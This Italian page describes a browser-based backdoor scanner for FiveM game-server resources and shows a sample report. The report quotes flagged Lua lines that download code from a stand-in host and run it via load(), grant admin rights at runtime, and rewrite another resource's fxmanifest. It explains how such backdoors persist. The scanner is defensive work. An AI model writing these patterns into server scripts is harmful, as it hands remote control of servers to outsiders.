devtoolsgg.com
Guide
GuideFiveMFiveMGarry's ModMinecraftShared
FiveMFiveM

Server e infrastruttura

  • server.cfg
  • fxmanifest
  • Permessi ACE
  • Scaffolder

Framework

  • Job
  • Item

Gameplay

  • Blip
  • Marker
  • Testo 3D
  • DiscordLog Discord

Sicurezza

  • Scanner di backdoor

Liste di riferimento

  • Sprite dei blip
  • Marker
  • Checkpoint
  • Colori HUD
  • Control
  • Formattazione testo
  • Veicoli
  • Modelli di ped
  • Armi
  • Colori veicoli
  • Stazioni radio
devtoolsgg.com

Generatori per chi gestisce server di gioco

Piattaforme

  • FiveM
  • Garry's Mod
  • Minecraft
  • Shared

Risorse

  • Home
  • llms.txt

Social

  • Presto disponibile.

© 2026 devtoolsgg.com

Nessuna affiliazione, approvazione o associazione con Cfx.re, Rockstar Games, Facepunch Studios o Valve. Tutti i marchi appartengono ai rispettivi proprietari.

  1. FiveM
  2. Sicurezza
  3. Scanner di backdoor

Scanner di backdoor

Trascina una resource, uno .zip o un singolo file e ottieni segnalata ogni forma nota di backdoor: codice scaricato ed eseguito, stringhe nascoste, permessi concessi a runtime e secret che escono. Gira interamente nel tuo browser.

Trascina una cartella di resource, uno .zip o un file .lua

Viene letto tutto nel tuo browser. Nessun file viene caricato, quindi puoi usarlo anche su uno script a pagamento di cui non ti fidi.

Uno .zip viene scompattato nel browser. Vengono letti solo i file di testo, fino a 400.

facoltativo

Dice allo scanner quale set di regole applicare allo snippet incollato.

facoltativo

Comodo per un singolo handler che ti preoccupa. Viene analizzato insieme ai file trascinati.

Non viene caricato niente. I file vengono letti e analizzati in locale, poi scartati quando lasci la pagina.
1Generated with devtoolsgg.com2-- RIEPILOGO -----------------------------------------------------------3File: 1   Righe: 134[X] 4 critico   [!] 2 alto   [-] 0 medio   [.] 0 basso56-- CRITICO (4) ---------------------------------------------------------78[X] Scarica del codice e lo esegue9    pasted.lua:210    > PerformHttpRequest("https://example-cdn.tld/p.lua", function(code, body)1112    Una richiesta HTTP sta a poche righe da una chiamata a load().13    Quella coppia è una shell remota: chi controlla la URL controlla il14    tuo server. Gli scanner pubblicati la trattano come un segnale15    definitivo.1617[X] assert(load(...)) esegue una stringa come codice18    pasted.lua:419    > assert(load(body))()2021    La forma di backdoor FiveM più diffusa in assoluto. Qualsiasi22    stringa arrivi a load() gira con tutti i privilegi del server.23    Risali a dove nasce quella stringa; se viene scaricata, decodificata24    o costruita a runtime, considera la resource compromessa.2526[X] Concede permessi a runtime27    pasted.lua:1028    > ExecuteCommand(("add_principal identifier.%s group.admin"):format(identifier))2930    La resource dà i diritti di admin a un identifier mentre il server31    gira, quindi non compare mai nel tuo permissions.cfg. Guarda a quale32    identifier li dà. Se non è il tuo, è una backdoor.3334[X] Riscrive un fxmanifest35    pasted.lua:1336    > SaveResourceFile("chat", "fxmanifest.lua", "client_script 'x.lua'", -1)3738    Modificare un manifest a runtime aggiunge uno script a una resource39    senza toccare i file di quello script. Non c'è nessun motivo40    legittimo per farlo.4142-- ALTO (2) ------------------------------------------------------------4344[!] Richiesta HTTP in uscita45    pasted.lua:246    > PerformHttpRequest("https://example-cdn.tld/p.lua", function(code, body)4748    Controlla la destinazione. Un controllo di licenza verso il dominio49    dell'autore è normale; una richiesta verso un dominio che non50    riconosci, soprattutto se porta identifier o config, no.5152[!] Scrive un file di resource a runtime53    pasted.lua:1354    > SaveResourceFile("chat", "fxmanifest.lua", "client_script 'x.lua'", -1)5556    È così che una backdoor sopravvive a un riavvio: si riscrive da57    sola, oppure riscrive un'altra resource o un fxmanifest, dopo essere58    stata ripulita. Comportamento documentato delle famiglie Blum Panel59    e Cipher. Guarda quale resource e quale file scrive.6061-- SEGNALAZIONI PER FILE -----------------------------------------------62   6  pasted.lua6364-- NOTA ----------------------------------------------------------------65Euristiche statiche, non una prova: segnala forme che di solito sono66sbagliate e tace sulla logica che non vede. Leggi le righe segnalate,67poi confronta la resource con la versione originale del suo autore.68
report68 righe, 2777 caratteri